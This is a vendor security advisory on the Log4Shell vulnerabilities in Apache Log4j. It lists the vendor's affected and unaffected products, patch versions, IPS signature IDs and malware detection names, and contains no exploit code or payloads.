Advisory: Log4j zero-day vulnerability AKA Log4Shell (CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832)

← Back to Security Advisories Overview
Critical
CVE(s)
CVE-2021-44228
CVE-2021-45046
CVE-2021-45105
CVE-2021-44832
Updated:
Product(s)
Client Authentication Agent
Cloud Optix
Intercept X Endpoint
Intercept X for Server
Reflexion
SafeGuard Enterprise (SGN)
SG UTM
SG UTM Manager
Sophos Authenticator
Sophos Central
Sophos Connect Client 2.0
Sophos Email
Sophos Email Appliance (SEA)
Sophos Enterprise Console (SEC)
Sophos Firewall
Sophos Home
Sophos Mobile
Sophos Mobile EAS Proxy
Sophos RED
Sophos SSL VPN client
Sophos Transparent Authentication Suite (STAS)
Sophos Web Appliance (SWA)
Sophos Wireless
Sophos ZTNA
SophosLabs Intelix
Publication ID: sophos-sa-20211210-log4j-rce
Article Version: 27
First Published:
Workaround: No

Overview

On Thursday December 9, 2021, a severe remote code vulnerability was revealed in Apache’s Log4J , a very common logging system used by developers of web and server applications based on Java and other programming languages. The vulnerability affects a broad range of services and applications on servers, making it extremely dangerous—and the latest updates for those server applications urgent. Sophos has observed widespread malicious attempts to exploit internet facing services using this vulnerability.

The vulnerability makes it possible for any attacker who can inject text into log messages or log message parameters into server logs that load code from a remote server; The targeted server will then execute that code via calls to the Java Naming and Directory Interface (JNDI). JNDI interfaces with a number of network services, including the Lightweight Directory Access Protocol (LDAP), Domain Name Service (DNS), Java’s Remote Interface (RMI), and the Common Object Request Broker (CORBA). Sophos has seen efforts to exploit LDAP, DNS and RMI, using a URL tagged to those services redirected to an external server.

Patches for Log4j

While there are steps that customers can take to mitigate the vulnerability, the best fix is to upgrade to the patched version, already released by Apache in Log4j 2.15.0.

Additional Log4j bugs, CVE-2021-45046 and CVE-2021-45015, have caused Apache to update Log4j from 2.15.0 to the version 2.17.0. A fourth CVE, CVE-2021-44832, was reported just after the Christmas 2021 weekend, on 2021-12-28, causing Apache to update Log4j to version 2.17.1. Sophos recommends you update to Log4j 2.17.1.

If you have already started patching with version 2.15.0 but haven't completed the update on all systems, our recommendation is to finish patching any remaining systems with 2.17.1. This ensures all systems will have a minimum version of at least 2.15.0 which addresses the critical CVE-2021-44228 vulnerability, and then you can then go back and upgrade those systems to 2.17.1 so that you have the same version everywhere.

What Sophos products are affected?

Sophos is reviewing and patching all affected applications and services as part of its incident response process.

Product or Service

Status

Description

Cloud Optix

Patched

Users may have noticed a brief outage on Friday, December 10, 2021 around 12:30 PM UTC as updates were deployed.

Sophos performed host forensics and log analysis in the Cloud Optix environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed.

PureMessage

Not vulnerable

PMX does not use Log4j.

Reflexion

Not impacted

Reflexion does not run an exploitable configuration.

SafeGuard Enterprise (SGN)

Not vulnerable

SGN does not use Log4j.

SG UTM (all versions)

Not vulnerable

SG UTM does not use Log4j.

SG UTM Manager (SUM) (all versions)

Not vulnerable

SUM does not use Log4j.

Sophos Authenticator Not vulnerable Sophos Authenticator does not use Log4j.

Sophos Central

Not impacted

Sophos Central does not run an exploitable configuration.

Sophos Endpoint protection (Windows/Mac/Linux)

Not vulnerable

Sophos Endpoint protection (Intercept X Endpoint, Intercept X for Server) does not use Log4j.

Sophos Email

Patched

Sophos performed host forensics and log analysis in the Sophos Email environment and determined that the vulnerability was not successfully exploited prior to fixes being deployed.

Sophos Email Appliance

Not vulnerable

SEA does not use Log4j.

Sophos Enterprise Console (SEC)

Not vulnerable

SEC does not use Log4j.

Sophos Firewall (all versions)

Not vulnerable

Sophos Firewall does not use Log4j.

Sophos Firewall auxiliary clients Not vulnerable

None of the Sophos Firewall auxiliary clients use Log4j:

  • Sophos Connect Client

  • Sophos SSL VPN client

  • Sophos Transparent Authentication Suite (STAS)

  • Sophos Authentication for Thin Client (SATC) (EOL)

  • Client Authentication Agent (all versions)

Sophos Home

Not vulnerable

Sophos Home does not use Log4j.

Sophos Mobile

Not impacted

Sophos Mobile (in Central, SaaS, and on-premises) does not run an exploitable configuration.

Sophos Mobile EAS Proxy

Impacted

The Sophos Mobile Standalone EAS Proxy was affected by CVE-2021-44228 and the fix was included in version 9.7.2 which was released on Monday December 13, 2021. The fix is also available in version 9.7.3 and all subsequent releases.

Customers can download the latest version of the Standalone EAS Proxy Installer from the Sophos website.

Sophos RED Not vulnerable RED does not use Log4j.

Sophos Web Appliance

Not vulnerable

SWA does not use Log4j.

Sophos Wireless Not vulnerable Sophos Wireless access points do not use Log4j.

Sophos ZTNA

Not vulnerable

Sophos ZTNA does not use Log4j.

SophosLabs Intelix

Not vulnerable

SophosLabs Intelix does not use Log4j.

 

Other products and services

Any other products or services not listed above are still under investigation. Sophos will publish updated information as it becomes available.

How are Sophos customers protected?

Sophos Managed Threat Response (MTR) customers

Sophos is actively monitoring MTR customer accounts for post-exploit activity.

IPS Signatures

IPS signatures were published on December 11, 2021.

Sophos Firewall

  • SIDs are 2306426, 2306427, 2306428, 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813, 2306526

Sophos Endpoint

  • SIDs are 2306426, 2306427, 2306428, 2306438, 2306439, 2306440, 2306441, 2306490, 2306493, 2306494, 2306495, 2306496, 2306497, 2306499, 2306526, 2306569, 2306570, 2306571, 2306572, 2306573, 2306574

Sophos SG UTM

  • SIDs are 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58734, 58735, 58736, 58737, 58738, 58739, 58740, 58741, 58742, 58743, 58744, 58751, 58784, 58785, 58786, 58787, 58788, 58789, 58790, 58795, 58801, 58802, 58803, 58804, 58805, 58806, 58807, 58808, 58809, 58810, 58811, 58812, 58813

Sophos XDR customers

Sophos XDR customers can use Sophos LiveQuery to help identify vulnerable Log4j components in their environment.

Example queries are maintained on the Sophos Community forum:

If you identify the vulnerable component, you should update immediately and review your logs for any signs of exploitation attempts. Sophos expects that a successful exploitation will not be logged by Log4j itself, requiring correlation with other log sources.

Malicious Payload Detections

SophosLabs has published detections for the malicious payloads coming via Log4shell. The detection are predominantly for crypto miners, attack scripts and malicious java downloaders. Please note that not all of these payloads are exclusive to Log4Shell and may be arriving via another vector.

  • Troj/JavaDl-AAN

  • Troj/Java-AIN

  • Troj/Java-AIP

  • Troj/JavaDI-AAO

  • Troj/BatDl-GR

  • Troj/Ransom-GME

  • Troj/StealthL-A

  • Troj/Bckdr-RYB

  • Troj/Khonsari-A

  • Troj/PSDl-LR

  • Mal/JavaKC-B

  • XMRig Miner (PUA)

  • Mal/ShellDl-A

  • Mal/ExpJava-AL

  • Mal/ExpJava-AN

  • Mal/ExpJava-AO

  • Mal/ExpJava-AQ

  • App/StlthLdr-A

  • Linux/DDoS-DT

  • Linux/DDoS-DS

  • Linux/Miner-ABU

  • Linux/Miner-ADG

  • Linux/Miner-ADH

  • Linux/Miner-ZS

  • Linux/Miner-WU

  • Linux/Rootkt-M

  • Linux/Swrort-G

  • Linux/Miner-EQ

  • Linux/DDoS-CI

  • Linux/DDoS-CIA

 

Related Information